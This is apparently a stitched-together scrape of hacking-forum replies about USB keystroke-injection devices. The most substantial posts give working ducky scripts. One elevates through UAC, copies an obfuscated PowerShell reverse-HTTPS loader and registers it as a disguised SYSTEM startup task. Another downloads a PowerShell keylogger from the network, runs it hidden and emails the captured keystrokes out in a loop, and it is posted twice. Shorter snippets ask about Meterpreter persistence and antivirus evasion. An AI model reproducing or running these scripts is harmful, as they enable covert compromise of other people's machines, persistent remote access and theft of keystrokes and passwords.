[[Payload Idea] Windows Task as System]

1 hour ago, Shonenx333 said:

Hey i'm done with the batch version of that.. but without the check if the user can actually run cmd as admin without entering a password :(

DELAY 5000
GUI R
DELAY 500
STRING powershell -c start -verb runas cmd
ENTER
DELAY 1500
ALT y
DELAY 1000
STRING for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do copy %a\powershell_reverse_https.bat %cd%\ps.bat
ENTER
DELAY 500
STRING schtasks /create /tn "Windows Help Service" /tr %cd%\ps.bat /sc onstart /ru SYSTEM /F
ENTER
DELAY 250
STRING start /min %cd%\ps.bat
ENTER
DELAY 200
STRING exit
ENTER

i just copys your generic powershell payload found in the ducky root named powershell_reverse_https.bat that looks like this:

powershell -nop -window hidden -noni -EncodedCommand JABrAEYASQAgAD0AIAAnACQAVwBMAHIAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAVwBMAHIAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQB...

to the current working directory which by default if cmd is run as admin is C:\Windows\System32 or whatever drive letter you have.

it then adds the powershell payload to run as a system task at startup as a SYSTEM user.

I also got a binary version of PSExec in cpp which takes much longer to startup from the sdcard (up to 6 seconds)... but it checks if the user can even run programs as admin without having to enter the admin password.

This payload right here should be finished within 6 seconds or sth :) 

Have fun

For some reason the file wont start at startup. I have tested with notepad.exe and another native exe file. Is there a reason for this?

Thanks

[[Payload Idea] Windows Task as System]

19 hours ago, Shonenx333 said:

I dont't see any reason why it couldn't. You just need a for example powershell reverse https payload which will then be started insted of the maliciousfile.exe.

I might make a payload tomorrow or so, but feel free to experiment :)

Cant wait!

[Violation of CoC]

1 hour ago, qdba said:

Good stuff.

 

Did some changes to your script like

- Minimize Powershell windows
- Dump WiFi creds
- Clear Run History 

https://github.com/qdba/bashbunny-payloads/blob/master/payloads/BrowserCreds/payload.txt

You have one for the usb rubber ducky aswell? 

Hehe

[Powershell keylogger in seconds]

21 hours ago, Mike Jamieson said:

First off I want to thank you for providing educational content to the community.  I purchased the USB runner ducky mainly so I can use a keylogger script on it. Unfortunately, I still can't get it to work.  I uploaded the mail.ps1 to my server in the public FTP directory, is that the correct directory? See Below the IP address of my server which i changed for security purposes, but is the same IP number format url. Finally I encoded the ducky script using ducky decoder and uploaded the inject.bin file to usb flash drive then put the microSB into the duck. I'm really stuck as to what I'm doing wrong here. Below is the mail.ps1 file I'm using as well which obviously I changed myemail to my actual email@gmail.com with password.

DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle hidden
ENTER
DELAY 1500
STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
ENTER
DELAY 400
STRING Get-Keystrokes -LogPath $env:temp\key.txt
ENTER
DELAY 200
GUI r
DELAY 300
STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://101.131.71.81/mail.ps1')
ENTER

$SMTPServer = 'smtp.gmail.com'
$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
$SMTPInfo.EnableSsl = $true
$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('myemail', 'mypassword')
$ReportEmail = New-Object System.Net.Mail.MailMessage
$ReportEmail.From = 'myemail'
$ReportEmail.To.Add('myemail')
$ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName
while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.txt");$SMTPInfo.Send($ReportEmail);sleep 360}

Any insight would be GREATLY appreciated.

DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle hidden
ENTER
DELAY 1500
STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
ENTER
DELAY 400
STRING Get-Keystrokes -LogPath $env:temp\key.log
ENTER
DELAY 200
GUI r
DELAY 300
STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://101.131.71.81/mail.ps1')
ENTER

$SMTPServer = 'smtp.gmail.com'
$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
$SMTPInfo.EnableSsl = $true
$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('myemail', 'mypassword')
$ReportEmail = New-Object System.Net.Mail.MailMessage
$ReportEmail.From = 'myemail'
$ReportEmail.To.Add('myemail')
$ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName
while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.log");$SMTPInfo.Send($ReportEmail);sleep 360}

I have absolutely no idea if this will fix the problem for you, but it worked for me. Simply changed the key.txt to key.log 

Hope it works for you too!

[Hidden/Undetected/Reboot persistent Meterpreter in under 5 seconds w/Smart privilege escalation]

Everything works except the persistence. Cant get that to work for some reason.. Do you know how to fix this?

Nice script though chaz!!

[Lazagne project : grab pass browser]

How are you making this undetected by AV´s ?

[Undetected + Hidden Meterpreter Shell under 10 seconds]

Nice script man!, quick question

Do you know if there is any way to convert a custom exe ( of your choice ) to a shellcode script? 

Thanks!

[Mr. Robot Hack (optimized payload)]

I have a quick little problem. The code and everything runs perfectly fine. My problem is that when the uac prompt comes up, it comes up as an non-active window. So, when alt+y is being pressed its not being pressed in the uac prompt window. Is there any way to fix this issue/workaround?

Amazing twin duck payload!

Thanks.